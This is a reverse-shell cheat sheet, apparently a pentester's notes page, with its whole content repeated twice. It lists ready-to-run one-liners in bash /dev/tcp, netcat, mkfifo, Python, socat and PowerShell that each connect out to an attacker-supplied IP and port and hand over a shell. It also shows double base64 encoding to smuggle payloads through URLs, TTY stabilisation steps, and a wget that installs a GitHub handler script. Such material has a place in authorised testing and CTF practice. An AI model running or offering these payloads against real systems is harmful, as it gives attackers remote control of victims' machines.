Reverse Shells

Last updated 1 month ago

Reverse Shells

Reverse Shell Generator

Bash

bash -i >& /dev/tcp/<ip>/<port> 0>&1

It is recommended to encapsulate the command in a bash -c '' to prevent issues with the /dev/tcp bash functionality.

We can encode the content in base64, to avoid conflicts with symbols and spaces in the URL. Additionally, to prevent any "+" characters from appearing, we can use double encoding.

Generate the payload:

echo "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64 | base64 | xargs -I{} echo "echo {}|base64 -d|base64 -d|bash"

Netcat

nc -e /bin/bash <ip> <port>

Mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

Python

i="<ip>" p=<port> && echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('$i',$p));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('bash')" | python

Socat

socat tcp-connect:<ip>:<port> exec:/bin/bash,pty,stderr,setsid,sigint,sane

PowerShell

Generate the payload:

echo '$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -t utf-16le | base64 -w 0 | xargs echo "powershell -e"

Interactive TTY

script -qc bash /dev/null

python -c 'import pty; pty.spawn("/bin/bash")'

and then run:

# Press <Ctrl> + z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows <rows> columns <cols>  # Check size in another window -> stty size

Automatic Shell Stabilization

I created this script which sets up a handler and automatically stabilizes Linux reverse shells. And for Windows machines uses rlwrap to allow command history, CTRL + L to clear the screen and other functions, also preventing CTRL + C from killing the session

# Add it to your PATH
wget https://raw.githubusercontent.com/NLXZ/pwnc/refs/heads/main/pwnc.sh -O ~/.local/bin/pwnc
chmod +x ~/.local/bin/pwnc

Last updated 1 month ago

Reverse Shells

Reverse Shell Generator

Bash

bash -i >& /dev/tcp/<ip>/<port> 0>&1

It is recommended to encapsulate the command in a bash -c '' to prevent issues with the /dev/tcp bash functionality.

We can encode the content in base64, to avoid conflicts with symbols and spaces in the URL. Additionally, to prevent any "+" characters from appearing, we can use double encoding.

Generate the payload:

echo "bash -i >& /dev/tcp/<ip>/<port> 0>&1" | base64 | base64 | xargs -I{} echo "echo {}|base64 -d|base64 -d|bash"

Netcat

nc -e /bin/bash <ip> <port>

Mkfifo

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f

Python

i="<ip>" p=<port> && echo "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('$i',$p));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn('bash')" | python

Socat

socat tcp-connect:<ip>:<port> exec:/bin/bash,pty,stderr,setsid,sigint,sane

PowerShell

Generate the payload:

echo '$client = New-Object System.Net.Sockets.TCPClient("<ip>",<port>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()' | iconv -t utf-16le | base64 -w 0 | xargs echo "powershell -e"

Interactive TTY

script -qc bash /dev/null

python -c 'import pty; pty.spawn("/bin/bash")'

and then run:

# Press <Ctrl> + z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=/bin/bash
stty rows <rows> columns <cols>  # Check size in another window -> stty size

Automatic Shell Stabilization

GitHub - NLXZ/pwnc: This tool is a Bash script for setting up listener to handle reverse shells on Linux and Windows.GitHub

# Add it to your PATH
wget https://raw.githubusercontent.com/NLXZ/pwnc/refs/heads/main/pwnc.sh -O ~/.local/bin/pwnc
chmod +x ~/.local/bin/pwnc